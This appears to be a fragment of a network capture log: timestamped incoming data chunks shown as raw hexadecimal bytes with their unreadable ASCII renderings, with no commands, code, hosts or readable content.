                                                                                                                                                            2022-09-29 12:45:15 UTC18114INData Raw: c8 2d 9a 1c 08 6e c9 76 9b 76 d2 40 60 1e 52 98 11 1b 4a be 89 f1 60 b7 06 53 e4 80 24 3d da 26 25 6c a5 76 c6 f4 85 f5 90 e9 b4 70 6c 23 35 39 59 17 a0 c8 14 64 6c ee 93 35 01 25 29 05 be c6 1d 4f 5f 6f 81 42 4e ac 93 9b 93 80 2a fd 41 7d e6 37 11 c6 99 60 2f 8b 7e cb 59 b7 e2 e0 02 d5 a3 ec 33 cd 4b 51 49 c2 05 b0 b7 2c 96 4f fd 08 5b 23 cc e6 4d d7 7d 43 df 6d 19 75 99 d3 de 2b f3 9e 69 90 cc 28 49 df 2c e0 4c 31 6c 1e c6 2c 82 56 10 1f d8 c5 b5 00 f9 59 65 49 0b a0 02 0f 18 18 f4 d3 ba ba c8 92 53 5b 99 37 c1 ed 0b b3 70 d2 a2 d5 3a c0 3d e8 71 07 4e 12 f0 64 94 3b 52 49 fb f4 40 e1 b5 10 6b 9d 84 04 ba 05 7a 3b 91 f4 ef be 77 2e 6a 0b 4c 89 bd 2b c8 50 c2 a9 a9 4d c8 58 4e d8 7e de 67 c8 10 7b 11 69 91 78 13 7c c3 f6 5b 9b f4 2a dc 96 f3 cd 4b 6a ad
                                                                                                                                                            Data Ascii: -nvv@`RJ`S$=&%lvpl#59Ydl5%)O_oBN*A}7`/~Y3KQI,O[#M}Cmu+i(I,L1l,VYeIS[7p:=qNd;RI@kz;w.jL+PMXN~g{ix|[*Kj
                                                                                                                                                            2022-09-29 12:45:15 UTC18130INData Raw: 2b 42 16 bc 35 5d 87 0f e0 d8 43 58 42 1d 1e 24 c0 03 11 bc a7 5a 0a a2 19 e2 86 4a 27 0d 2b d4 fb b2 0f 14 7f c3 ee f4 34 33 ef 6e f0 77 58 ef 06 17 8a b1 7e 7b 04 4d 8b 8f 49 78 a3 7b 3c a2 61 fd 9c 0e 38 a4 30 e7 68 16 c7 6e 93 f9 96 63 43 5b 56 15 a4 a2 d8 17 5b b4 d8 8f f8 07 2f da 13 9a 31 41 8e ce eb 08 75 77 08 d3 aa b6 07 ab 09 13 98 a3 99 8a a4 fc bc e9 0a fc 06 b9 e2 6a 23 a6 7d 50 3c b3 83 d5 a5 6e 94 56 29 67 36 eb b2 19 24 e2 8d b5 85 87 8d 91 1f 0c a4 b4 67 00 49 9f 96 6b 47 10 37 e9 14 3e 2a 88 35 aa 8e 76 cd a8 21 02 bd df 2e bc fd 4d 08 2e 59 29 d2 c0 db eb 7a 62 e2 16 6a 9a 81 cf 7a 5c c4 2f cf d6 03 be 5c 70 62 bb 14 32 58 b3 19 13 72 ef bd 04 80 5c 76 74 6f e5 39 73 29 c7 e9 2a e0 43 85 73 3e 8b 2f c9 bb 5b 16 f8 30 9e b6 dc 5a b4 6b
                                                                                                                                                            Data Ascii: +B5]CXB$ZJ'+43nwX~{MIx{<a80hncC[V[/1Auwj#}P<nV)g6$gIkG7>*5v!.M.Y)zbjz\/\pb2Xr\vto9s)*Cs>/[0Zk
                                                                                                                                                            2022-09-29 12:45:15 UTC18146INData Raw: bf 9a ec f3 c5 74 48 ed 82 f7 47 2d 9d a5 83 62 d5 5d c1 a8 f3 c9 1b ca 1a b7 a6 95 24 65 c8 01 76 cf f4 d4 d2 5a 22 5f ab f3 bc fe c6 c7 09 a6 d1 d6 ca 0b d2 5f 17 66 8f 41 3e e8 9a 1c fc 19 d0 50 50 10 bd 2f 6f d6 4e a7 6f 8d 8f 50 62 91 b8 96 50 52 76 20 f4 2e e3 0e 1c 70 bf 23 9e 45 17 9a fb 88 6b 60 62 b3 ea a8 77 2d a6 e2 0f c5 5a 79 26 0f ca b3 e1 67 69 e8 b7 ad 98 aa c9 a0 f6 40 b6 18 81 66 e9 f8 31 1d 30 a7 fb 16 96 32 9a ea 55 74 86 be 73 db 65 7d 99 11 4c 41 77 a0 13 3b a4 ec 30 bf ef e5 2a a2 d9 8d 9b 40 ab c2 7f 95 fb 99 c0 82 87 f9 33 ec 20 63 a2 5a 90 7e 0d 37 00 8a 60 45 6c 14 af b6 dc 6c 32 1d af fa 39 9c e1 88 80 0d 44 84 f0 17 f1 9b ac 62 ee 28 46 3d 4e 9f 94 d7 74 40 f0 90 f0 0b a9 0a 76 cf 0a 92 9f 42 17 0d f3 40 29 f9 b1 c5 9d b5 8a
                                                                                                                                                            Data Ascii: tHG-b]$evZ"__fA>PP/oNoPbPRv .p#Ek`bw-Zy&gi@f102Utse}LAw;0*@3 cZ~7`Ell29Db(F=Nt@vB@)
                                                                                                                                                            2022-09-29 12:45:15 UTC18162INData Raw: 4a 80 4f c0 54 7e f6 5d df 7c d8 56 a9 c0 d4 fa f5 73 f3 25 93 ed 90 59 65 5a 3f 4e 20 e0 96 6a 0b e6 3f 8b ff a6 91 8a a4 44 9d cd 0f 79 c8 7a dd 3d d3 ec 54 54 6f 7c fe 6a 4b 06 fc e0 38 7a 1e 3e 0d 15 40 63 8d e5 de 13 38 3a 0d 70 18 9f a1 93 ea 9a 60 47 68 9b 51 33 1f e3 53 46 8f a1 9e 5d 98 0f 58 25 59 26 79 2d a9 c7 aa dc d9 d5 3c 1b 4b a2 82 c3 f3 24 5b 8c 80 23 cd 43 d9 b7 d1 41 f4 e5 e3 3f e9 50 e5 22 c4 b0 76 09 b4 bb ce 16 aa 38 67 a8 b5 be 01 71 80 29 75 50 bf 54 89 85 a5 75 52 ae e4 51 64 e4 26 0f a0 0e a1 ec fa c9 3e 3c d2 1a 8e fe bf 37 29 ac 5b 20 58 fe af 43 ee cc 75 d1 44 4c bd be 24 30 ce aa b7 50 e5 37 54 db e1 8e e9 d9 54 82 f6 84 a3 f2 74 11 2b 17 e6 08 e0 d9 ac 0f e4 32 2e bd fd 28 51 a6 83 b9 cb 78 67 ff 6b e1 f9 d9 fe 54 85 91 83
                                                                                                                                                            Data Ascii: JOT~]|Vs%YeZ?N j?Dyz=TTo|jK8z>@c8:p`GhQ3SF]X%Y&y-<K$[#CA?P"v8gq)uPTuRQd&><7)[ XCuDL$0P7TTt+2.(QxgkT
                                                                                                                                                            2022-09-29 12:45:15 UTC18178INData Raw: df a4 b4 85 03 39 37 97 39 db 12 98 39 8f 6b 75 c4 08 6b 79 75 56 90 4e bf c6 e3 e6 76 83 31 37 25 26 1a ff d0 6f 1b 9c 9b 44 d8 c1 80 97 06 01 cd dd 03 28 60 e3 7c 36 dc 6e b1 4b 5f ed ba 94 0c 52 a9 70 11 37 bc 31 7a 60 0a 51 45 7e 3e c7 50 b7 66 1e 00 04 26 8d 02 dc c3 1d 47 7f de 73 54 32 a7 8b 21 43 1a 12 35 df 5e 79 38 b0 91 6b 58 09 e4 93 21 e7 4d 66 53 95 cb 21 22 a9 37 8a cb 82 8d 04 75 12 56 be c7 a6 97 78 b1 98 ab 7a d0 10 ea 3f 4e d9 40 22 e0 96 98 88 3a be de 80 f9 71 a6 37 5e 7f 09 26 f1 52 35 d8 09 a8 d5 45 80 8d 39 4e d1 87 4c 78 1c ec d6 7d 38 4f dc 94 af 0f 93 da 35 bf 09 1d 63 9e 49 3b 04 95 eb ec d8 7a 7e 9e 24 1f aa 5e d1 bc 34 0d f2 f7 92 cb 0a ab 02 12 48 e7 78 f4 f7 b2 ba 4d 61 12 98 85 79 ae fb 61 40 50 6e 48 4b f2 5d 5a d5 9d 92
                                                                                                                                                            Data Ascii: 9799kukyuVNv17%&oD(`|6nK_Rp71z`QE~>Pf&GsT2!C5^y8kX!MfS!"7uVxz?N@":q7^&R5E9NLx}8O5cI;z~$^4HxMaya@PnHK]Z
                                                                                                                                                            2022-09-29 12:45:15 UTC18194INData Raw: c7 9d 87 0d 6c ba 96 29 bc b5 f9 c6 06 fe cd 9c 66 e1 b4 34 12 65 a9 b5 fc 7f 38 70 ab 04 5b 0e ac d8 49 ac f5 ce ea de e4 97 54 be 44 ee 59 06 da 7e 81 7b 3b 14 37 32 77 5f 9f ae c3 73 4d 28 b9 26 78 82 db 21 57 72 a9 a1 5c c5 01 91 4e b8 10 30 ad b4 90 4b 07 68 b2 2f 60 12 ce 29 08 c8 f1 1f a2 48 79 4f 26 c0 b6 7d 2a ef 90 d6 4d e8 27 b3 49 52 4f b5 4a fc 00 00 f8 21 d0 e2 85 a5 81 c6 3e 55 e8 81 d6 08 56 49 1a 75 71 45 34 19 b5 8c 7e 97 7e e6 d6 32 e2 18 48 a1 2c 36 6d 2b be 54 bb 1a 7f 2b 7d 4f 92 79 7e fb 99 f8 1f 8d d5 e6 f2 58 0a 27 e4 b6 a0 f0 d7 78 df f6 5a e1 2b df 31 0c ab 35 cd a1 eb f6 26 a7 97 a8 2f f1 5c c0 0e 31 e4 f6 ca 52 cc 51 d0 8c 8a 4a 9a c2 a7 0e e0 46 e7 aa 66 6b eb a4 c0 b4 e9 6b 03 86 3a 4b f6 87 8f 92 c6 fb ed 8e de 74 b7 08 7b
                                                                                                                                                            Data Ascii: l)f4e8p[ITDY~{;72w_sM(&x!Wr\N0Kh/`)HyO&}*M'IROJ!>UVIuqE4~~2H,6m+T+}Oy~X'xZ+15&/\1RQJFfkk:Kt{
                                                                                                                                                            2022-09-29 12:45:15 UTC18210INData Raw: a4 4b 88 de e1 b9 72 ac 76 12 ec 18 a0 80 bb bf d8 76 fb 25 b3 ce 22 73 c4 02 e7 0b 08 75 20 53 a0 7b cd 6f df 37 38 98 f1 d5 17 cd 3c 4d b6 f6 e7 d4 45 8e 77 a7 7d 68 d6 49 a9 0e a2 46 d7 39 40 34 37 c0 df 92 e7 a7 4b a9 a1 7f 66 fa 5c 84 27 bc 2c 3c 92 1d b1 9e 0e 2f c1 1f 81 27 dd da 25 f0 59 b5 7a 21 23 af de 87 76 d3 ac d5 03 05 2b ed 93 61 52 56 f2 f4 86 4c d0 91 8c 52 75 4a a0 95 30 df 8c 5f ec e6 c4 ef 7f 2b aa a6 bc 9a 77 f9 69 08 a4 74 aa f6 ed 0f 56 0a db f5 f4 b3 c7 ba d4 f4 36 1f 16 39 67 13 e2 86 16 10 00 20 d8 78 40 a4 34 c5 b9 20 cc 22 72 7e f4 f3 6f 6f b9 6d 31 5a be ca b7 2e a2 e6 c3 12 6a 18 d1 a3 0d d7 84 00 b7 d5 87 3d 2d be 28 59 48 0c 60 a3 f4 ab 90 26 74 68 ab aa b1 94 6a b5 59 e1 d2 e0 fb 13 b8 cc d1 d2 42 9e 8f 5b 56 4f 8f 0e 32
                                                                                                                                                            Data Ascii: Krvv%"su S{o78<MEw}hIF9@47Kf\',</'%Yz!#v+aRVLRuJ0_+witV69g x@4 "r~oom1Z.j=-(YH`&thjYB[VO2
                                                                                                                                                            2022-09-29 12:45:15 UTC18226INData Raw: 83 12 c1 79 e0 31 cc 86 a8 11 97 3c 6d 2b e0 03 88 41 bb f3 56 83 0f 42 10 33 02 dc 9c 3f 63 53 a7 1d 7e 06 7e 92 ba 47 17 9c 45 6d 18 11 93 ad 45 04 2d ca b3 bd 6a d2 e3 5d 32 f6 e2 48 46 3b 16 88 95 34 bc 84 e9 66 58 1e 08 5b 1b 25 75 a3 77 19 44 a7 25 8f a2 8d c7 e2 10 e2 ab 18 98 fb 44 cb 0e 59 02 02 fd 4b 4a 74 b0 22 1c 6a d0 92 26 81 50 3f 1a 90 48 94 be 81 45 33 8b 4d 35 5f fc e3 2e 47 1c 34 c7 08 fa c1 ea d4 3e f0 2e 83 0a 57 f6 c6 e3 09 ab f5 27 74 e4 ba eb 49 6d b7 a3 ac 9f 7e b0 bb 2f 73 dd 5a 02 2f 49 95 54 58 ca 51 aa 0b 4d 70 8c 24 97 f2 89 dc 05 f8 a4 2a 9f 77 da 14 75 01 e4 5f b8 92 77 08 ee 82 68 d2 8b e4 eb e6 86 da 06 98 7b 19 95 d4 c8 4c db fe cc 90 85 3c 7d 19 9b 08 dc 47 42 7e ef 11 1f e8 e5 cc 81 01 03 bf 7c 57 77 66 0b 04 c9 51 91
                                                                                                                                                            Data Ascii: y1<m+AVB3?cS~~GEmE-j]2HF;4fX[%uwD%DYKJt"j&P?HE3M5_.G4>.W'tIm~/sZ/ITXQMp$*wu_wh{L<}GB~|WwfQ
                                                                                                                                                            2022-09-29 12:45:15 UTC18242INData Raw: e3 45 d2 81 96 9b 3f 91 8e 33 35 46 29 4a ca 39 d1 c4 4c c0 08 05 84 5a a7 e9 06 17 cf 2b b8 dc a9 4c bf 52 fd bd 67 ba 93 4d b1 41 e2 3d 63 35 e6 c7 b4 ef dc 03 5c 34 b0 74 53 d5 a0 17 e9 9e 70 21 80 fd 60 57 3c 68 dc 6b 51 b4 2e 7e c8 e3 49 8e be 89 a4 65 be ab c1 7c 47 07 10 a1 5b 0c f8 43 bd 48 76 18 55 12 6f b3 02 fa 2e 15 3a ce a2 f0 0d 62 bc 99 ae 25 9d 73 fa ef d1 d2 26 b4 32 1f f4 82 6c 30 12 9e 34 52 b8 99 8a 90 b7 29 23 36 3c 93 33 e0 07 5b 14 62 65 31 0f 8f 1b c1 b0 f7 23 1c a1 f4 5e 50 9a da ee 8b b8 60 29 e0 b5 75 70 b5 4f 9a aa 2f 95 62 d7 50 15 ce 07 a3 00 ee 44 4c 96 70 1b a1 d7 fc ea 0c 5a 34 ab c8 40 66 1b 20 78 ce ca d4 64 db 94 e2 87 22 31 9c 1c 8a 6c 9a e9 87 3b a3 74 75 57 ac 93 ad ad 37 7d ce 0f b7 e1 b6 da c5 6e df 2e 81 dc bd ac
                                                                                                                                                            Data Ascii: E?35F)J9LZ+LRgMA=c5\4tSp!`W<hkQ.~Ie|G[CHvUo.:b%s&2l04R)#6<3[be1#^P`)upO/bPDLpZ4@f xd"1l;tuW7}n.
                                                                                                                                                            2022-09-29 12:45:15 UTC18245INData Raw: 1a ca 06 64 b7 54 c5 55 39 11 9c a6 ea 06 81 03 73 58 3f bb f9 f9 f9 f4 24 40 2f 48 0e 90 ff 5c 66 db 0c 11 a9 10 0b 71 cb 04 22 9d 0e f5 04 64 44 20 c5 e3 0f 42 df ea 19 c7 95 1f 97 12 7e 8a 3c 97 43 05 03 0b d1 fb 63 90 43 b1 c6 9f 76 86 1a 12 6a c3 70 fc dc a7 1f c5 93 1a 06 1a ad 7e e8 a4 25 ef 3d 3e e7 69 54 6c dc 0f f6 06 11 30 c2 b7 03 b5 61 bf 78 0a e9 dc 0e dc 12 0f b0 e0 cc c8 61 44 f9 8e 1f fb 6e 0e 45 c3 2d fb 7d b0 c1 81 7e 4e 39 be 7d ae 24 c1 cf e6 07 3c af c5 68 1e 9b 63 25 18 8c 26 e7 84 cc 79 bc 13 bf e3 f9 91 58 8e 59 a4 bb ed ac 25 d2 e9 4b 2f 80 3c e6 17 5f e7 ae 0d 68 df e1 6f 34 e4 fe ef d2 a9 87 42 d0 9b 73 91 92 42 21 8c 38 e3 18 95 24 60 4c 48 fe cd b8 c6 fc 16 a0 8f ba d0 fb 01 65 01 06 f2 4b de 98 14 9b 44 a8 d5 ed b0 ce 35 4d
                                                                                                                                                            Data Ascii: dTU9sX?$@/H\fq"dD B~<CcCvjp~%=>iTl0axaDnE-}~N9}$<hc%&yXY%K/<_ho4BsB!8$`LHeKD5M
                                                                                                                                                            2022-09-29 12:45:15 UTC18261INData Raw: d2 9f 29 fa 38 6c 65 51 da 25 41 49 a0 a6 74 80 7f c5 d5 66 de 1d 9e d6 2f bb 85 c2 28 56 9e 29 61 5b 24 d0 bd b1 bd 12 c0 73 d1 19 92 ed 0f 51 7f d4 30 e0 34 72 ab 90 24 c8 b3 6d 0c 3c 41 e0 8f 10 0f da 12 23 18 8c 24 c4 a5 65 d6 2a 90 60 39 1e d5 33 cb b8 90 ac 26 9f 54 0a ff 0e 8e cb 46 7f 6c 09 91 69 fe d3 0f 6e 1f b3 fc 5e 89 62 1a 4d f9 8f 46 e5 dd 8d 5e 61 05 12 35 9f 0e 6b 07 e6 72 bd c0 04 06 12 37 cc 30 94 a0 43 f0 6f 72 80 da f5 31 82 91 3f a1 0b 49 a1 d2 5f 34 57 75 66 2c db 03 f2 fa 17 b0 9f 7b 6c ff f5 26 c8 17 20 b9 fe 00 b3 7e 9c 83 a4 1e dc 56 c1 0e f0 ba 1d d2 06 d3 16 5e a2 a5 f3 ea 1f c7 52 12 a8 f6 92 d2 5a 0f 43 e2 9c bb 68 15 a0 28 f9 43 c3 ce 5a bb 0d 9e f4 8a c9 b6 14 1e d9 22 9f 99 df a9 a6 cb 31 46 59 b8 a3 59 f9 50 71 bf 4b 99
                                                                                                                                                            Data Ascii: )8leQ%AItf/(V)a[$sQ04r$m<A#$e*`93&TFlin^bMF^a5kr70Cor1?I_4Wuf,{l& ~V^RZCh(CZ"1FYYPqK
                                                                                                                                                            2022-09-29 12:45:15 UTC18277INData Raw: 36 83 b5 0f cd 08 e2 1a 04 86 92 66 a0 30 42 a9 47 20 3a 22 88 3b 9d 75 fd 24 a8 9b c4 7e 5d e4 b6 b6 73 8c 0c ff 4a f7 4f 71 18 39 96 73 d0 f1 36 57 0a 9c b7 c4 f8 e0 12 81 3d 45 5e 0d bc 2e ff d9 ce 6d 1a f0 a6 a1 88 7e e2 7f 52 44 2e 33 2e 9e 9e f3 7d a8 52 80 6a a6 9b 78 e6 da 19 d6 2e 49 6b f5 0e 1b 3f 92 80 59 d7 67 ce d4 d6 9f e3 e7 99 3a 61 09 fd ef a8 ba c2 3b cf 8a a4 9f f3 00 5b 40 83 43 6a b3 51 e9 f5 71 bf e9 be 3f 45 fa 77 4c 23 6b d6 20 38 4b 4c c8 3c e4 a2 df ab 14 72 b5 38 6e df 01 91 28 6e 33 f1 a2 a6 18 b9 f1 15 cb 03 5d 2d 1b 99 2b 77 e6 c0 25 b6 47 e4 23 93 38 4f d7 cf 05 f6 48 c9 6e 7c 13 29 f3 27 51 ee 32 1e 83 33 80 ae 03 0c b1 7c cb 0c 21 cb 7f cc 7c 09 00 ea 22 99 df 8b b6 c2 76 32 b8 c5 13 93 4f cd 2f 05 08 ba 4a 07 b1 b2 63 b9
                                                                                                                                                            Data Ascii: 6f0BG :";u$~]sJOq9s6W=E^.m~RD.3.}Rjx.Ik?Yg:a;[@CjQq?EwL#k 8KL<r8n(n3]-+w%G#8OHn|)'Q23|!|"v2O/Jc
                                                                                                                                                            2022-09-29 12:45:15 UTC18293INData Raw: ae 6e 95 c5 27 9d 37 fd 1d ce bd aa b4 6f 6a 89 c5 be 38 da 5a 6d a9 9d c5 49 eb e2 0d 98 10 2c 0a 81 2f 9b c4 f9 c1 2b eb e7 19 a5 0e 85 40 c8 db df 72 3c 46 57 ac 0b da 7a 1e d8 a0 4a 61 07 7e 2b e4 84 b3 bf c7 c9 30 3a 18 f5 2a 43 23 97 49 2f 92 83 fa 64 24 b2 4e d2 3c ef d8 7f b8 4c 66 a0 46 8f e6 96 27 c8 e1 2d a4 25 f8 01 04 72 0b 70 6b 6c 35 2f 93 df 41 b0 42 fc b2 75 4d 80 a3 e8 66 b6 9c 5b 2b a6 c5 95 b3 ea b0 62 ec ef 84 ee 54 55 da 75 29 fd bb 48 dd 6c 6f 1e a8 d0 d3 07 a8 21 53 be 7b ef 14 38 6e df 1b 61 a6 23 7f 17 b8 9b 48 91 43 ac ed 57 c1 1a 3f ef 75 6c f3 34 68 d3 70 ee 8b 4d 9a d7 77 c4 32 c0 b3 c1 ce b7 6b 20 63 a1 63 51 43 4b e4 3b d1 b5 dd 97 b2 8a 16 3b 7d 1a a1 3c 56 7d 03 a5 6a 8b d8 34 9d 3a b9 2e 16 04 7b 1e 52 40 45 ac 3b 47 b3
                                                                                                                                                            Data Ascii: n'7oj8ZmI,/+@r<FWzJa~+0:*C#I/d$N<LfF'-%rpkl5/ABuMf[+bTUu)Hlo!S{8na#HCW?ul4hpMw2k ccQCK;;}<V}j4:.{R@E;G
                                                                                                                                                            2022-09-29 12:45:15 UTC18309INData Raw: b6 c7 c1 8f 99 62 28 7e aa 3d 94 54 b8 98 1e ae e3 86 90 ee e0 95 75 f0 01 92 14 38 b9 9a 99 21 77 fd 08 76 7e e4 3d 16 87 a1 d5 a9 57 15 34 c4 cd 5d 7e 2c 1f 92 ba 5f f6 12 38 68 38 ba 36 3e 81 0e 20 79 68 d9 26 5a 4a f7 6d 95 c8 15 f3 3d 1e 55 b6 bd 1b a1 4f 1f 7a 5e b7 35 63 99 03 35 90 81 80 13 54 86 f2 7c a3 b3 fd 60 23 cd 5b f3 96 70 7d 73 27 b4 28 ac cb 5b 1c c5 c4 42 bb 6e 3f 68 b0 9e a5 45 e6 7b 12 e1 6a c6 0f 1f e0 62 98 f3 65 b7 8f b6 f8 2d 3b a2 7e ca 21 d2 20 78 da 54 87 35 51 25 38 61 79 e1 23 59 01 59 15 63 e6 b7 d8 5b 22 ea 36 25 c2 cc 4d df 42 9b fc ed 6d 6d e2 b7 cb a2 01 61 9a 3f 7e 80 eb 23 58 e4 37 b9 9c 0c 94 1c 43 3c 6c 48 8c 0f 9f f8 02 e2 1a ce 29 85 d7 ec cb db 47 ad 32 5f ab 77 1c 8c d6 22 23 38 58 3d 84 20 93 54 d4 74 88 a3 f4
                                                                                                                                                            Data Ascii: b(~=Tu8!wv~=W4]~,_8h86> yh&ZJm=UOz^5c5T|`#[p}s'([Bn?hE{jbe-;~! xT5Q%8ay#YYc["6%MBmma?~#X7C<lH)G2_w"#8X= Tt
                                                                                                                                                            2022-09-29 12:45:15 UTC18325INData Raw: 23 89 73 a4 5e cf d5 91 f3 52 4c 3c 53 cf 97 26 9b c7 12 60 5d 57 9c 88 7c 66 61 7b b7 30 9c 3e 97 e3 00 a6 1e 5c b4 63 80 86 11 af f3 0e bb 0f 18 96 db 85 75 03 76 63 7d 90 12 75 3b b7 20 b8 ef c3 4c 96 ed 88 58 34 9f f6 cf bb 41 4b 1a 17 00 f8 66 0e 4a 7a 0e 59 6e 11 16 22 ac 6c e8 9d 25 35 72 f9 32 3d be ef 8c 9f bf 84 2b e9 c1 58 d3 77 d5 87 a1 91 e4 ab 92 01 f7 57 61 de ed 11 9a 23 b8 4c 2e 76 24 3d e2 24 50 32 24 05 93 a8 0a 3a de f1 d4 d2 28 5a 2a ac 6e 76 1d 34 a4 d2 3f ce 12 49 ee 94 65 9d be 85 4d ff b3 e6 a9 a3 88 dd c1 ee 02 c0 f6 5d cd d6 c4 bf 9d a6 f0 82 8d d7 1d 60 98 44 59 c1 1d 08 fc cf ac 5c 74 0b 55 b8 a1 c1 9d 4b 79 8d d2 e2 6d 1c 5e 78 12 2b 86 11 b0 67 06 e9 43 b8 c8 22 c6 f1 3f 92 ec 5e e1 dc 4f 5c 4f 12 0f e1 af 08 ba a5 21 30 d6
                                                                                                                                                            Data Ascii: #s^RL<S&`]W|fa{0>\cuvc}u; LX4AKfJzYn"l%5r2=+XwWa#L.v$=$P2$:(Z*nv4?IeM]`DY\tUKym^x+gC"?^O\O!0
                                                                                                                                                            2022-09-29 12:45:15 UTC18341INData Raw: 94 0e 3d 51 97 fc 39 17 d7 33 4a 22 5e 0d 70 50 f5 00 5e f0 5b 38 01 54 de db a1 0d 69 6d b4 4f 93 7b 8f 0e f7 9b 37 08 b8 2a f3 8e 9e 99 ba 7b d8 fb 75 65 17 ad 7d ba 96 5a 87 ac 15 02 bc 68 81 98 bc 19 d9 3d 2c 96 87 34 92 23 e6 e9 f5 2d f2 6d 4c 24 a2 42 95 00 b0 27 99 05 f5 4d 29 de b0 35 03 e9 f8 24 2f 54 5c 96 35 0b c8 bd b9 d5 c7 ed 94 f3 ca d9 b2 36 6c 78 bc e7 a2 55 80 f8 1f a9 c0 d4 b4 d9 19 06 d2 2b de 9a ef 95 7f 85 c2 8d 3a 1d ea 23 8e b9 10 50 37 4e d7 32 09 21 67 01 22 ff 70 78 7d 65 7e de da be 44 1f 82 d4 71 97 b1 84 42 57 74 47 16 df b7 87 e0 40 25 db dc 14 9d 68 f8 97 56 c3 65 94 e5 25 00 fe dc aa e6 9b 82 56 3b 82 21 fc 93 6a 7a 24 6d c7 5b 60 32 bc 5c 9c e7 39 0f 25 3e 43 d8 b6 bf 25 fc c9 26 c8 a5 d5 07 2d 15 89 18 e5 18 19 ba f4 e9
                                                                                                                                                            Data Ascii: =Q93J"^pP^[8TimO{7*{ue}Zh=,4#-mL$B'M)5$/T\56lxU+:#P7N2!g"px}e~DqBWtG@%hVe%V;!jz$m[`2\9%>C%&-
                                                                                                                                                            2022-09-29 12:45:15 UTC18357INData Raw: 6d 09 47 db 93 2a b0 3c 54 2a 6c 98 e8 32 e1 40 9e 10 a3 78 2d c7 89 2a c3 61 1f d0 ca 67 84 be cd a5 ee c7 de 5e 16 1b 27 d4 2c cd 74 45 55 b9 7e 02 81 1e 73 0e 53 87 f1 76 5e fa 6f 25 d5 cb 5f ce c7 2b d2 af 9b f6 43 17 b3 e2 7b 1f 32 23 00 48 2a 95 51 09 49 8e c3 98 5c f0 d4 a3 a1 dd d8 82 63 d7 32 52 53 bd f8 db 1d ed ad 7c b4 ff 68 e6 7b 3d 58 d7 d0 02 d9 6f 87 ef cd ef 5a d6 b9 eb af fc d4 16 6b 9d 9f 75 3c 0b 66 5d d7 52 af c3 4e e5 fb 2d 69 95 f1 b8 0f b5 32 15 4e 90 e3 8b 71 82 cd a7 49 23 e4 cf 15 07 82 da e1 ac 53 19 63 d2 7c f6 b0 d8 ce 82 93 b0 57 3f b8 52 d7 83 c0 e7 17 99 73 1b 9a ec 29 c5 15 24 df dc 04 55 c0 c1 9d 89 91 8d 1a 6c 3b 92 42 cb 26 93 bd 97 62 99 25 f9 8b 2e 73 4c 0d e0 2a 85 b8 1f a9 d0 0d 96 85 51 ab 13 c9 d5 f2 c8 e3 ff 82
                                                                                                                                                            Data Ascii: mG*<T*l2@x-*ag^',tEU~sSv^o%_+C{2#H*QI\c2RS|h{=XoZku<f]RN-i2NqI#Sc|W?Rs)$Ul;B&b%.sL*Q
                                                                                                                                                            2022-09-29 12:45:15 UTC18373INData Raw: dc 7c 5f 6f eb cd 7e 64 02 a3 b2 e1 7d 9e 7c ae 46 8c 1a 8e 17 79 6b 2a 52 f1 af 24 b5 ab 63 4f 6f 4f 2b fe 81 b0 74 ab 19 e4 72 a0 66 ba 14 42 f7 f2 df 72 68 95 c8 8e 24 f0 bc f7 7e b2 39 a3 00 71 6a 77 41 c9 8f 22 9d eb 16 16 cd 22 c2 38 04 c6 25 81 f2 c2 e1 53 22 1e 5b 85 58 e7 a2 c5 1d cf 3b 72 a4 82 5d 63 18 e3 e9 c7 c8 d2 53 80 ca 93 ce 73 2b b7 12 d8 fc de 10 db 63 f0 1d b0 3b 8d 03 5c 00 7f 67 a9 f2 55 7d 35 1b 80 74 a2 13 b6 b3 df bb 97 f3 42 ce a3 90 e6 e6 71 e5 3f cb 92 ac 08 b7 3f 08 a1 68 a2 25 53 1e d9 60 4a 14 4d c4 ac d9 84 8e 69 48 61 27 3a bd fa 54 40 69 d0 38 1d 35 47 46 65 a1 c3 98 73 ae ef b2 70 f3 a4 1f 49 22 dc 8a b7 c8 68 03 f1 36 bf fa d6 a4 4f df b1 c8 2c dd 45 5b 9c 2e d3 0b 62 29 b1 29 2c 3d b1 f7 b9 62 00 bf 27 2a 3a ae 11 9f
                                                                                                                                                            Data Ascii: |_o~d}|Fyk*R$cOoO+trfBrh$~9qjwA""8%S"[X;r]cSs+c;\gU}5tBq??h%S`JMiHa':T@i85GFespI"h6O,E[.b)),=b'*:
                                                                                                                                                            2022-09-29 12:45:15 UTC18389INData Raw: 32 d3 1e ad 4e c3 77 c0 3d fb c6 df 59 2e fd bb 59 da 1d f6 ba 31 ec ba 2d e5 23 16 26 90 dd 3e c9 b1 3c 43 77 8b b0 1d 3c f2 03 65 78 5e d8 9e 51 0b 95 15 7f 56 c6 89 ac 29 e2 93 e0 12 4b a8 a1 1c 9c 25 d1 78 6e 4f c3 42 a4 01 8a 14 2f 9e dd 1c c8 cd ff f3 54 2e 59 94 0b 43 3a 0e e8 03 5a 50 9b db 4c c5 38 ce 8c e0 0a 34 38 5c c7 f1 3e 4a 10 2b c1 d4 e9 63 a5 99 5b 87 51 f9 43 ba 65 5b c2 6f b3 be ca 8f 9e 8a 10 77 9b c2 93 64 8e 8d 5d 6a 6e d6 ed 50 a9 45 d1 1f 09 df fa 01 51 c1 b4 2a 25 6d 14 a9 4a 6a d2 f5 71 90 b4 14 39 2d 02 9d 0f 02 aa 96 43 9e f8 7e 2e 9a b5 55 6d 12 ba 73 5c a1 a8 95 92 b6 38 f6 8f c0 ee d0 df f6 f1 91 b6 88 a6 d8 a6 81 32 2b 06 27 28 55 a3 bf 75 55 6e 95 d6 87 6e 30 67 0e d6 23 fd 3e 4f 4c ed a9 ec 79 67 d9 f2 43 95 a0 e1 40 3e
                                                                                                                                                            Data Ascii: 2Nw=Y.Y1-#&><Cw<ex^QV)K%xnOB/T.YC:ZPL848\>J+c[QCe[owd]jnPEQ*%mJjq9-C~.Ums\82+'(UuUnn0g#>OLygC@>
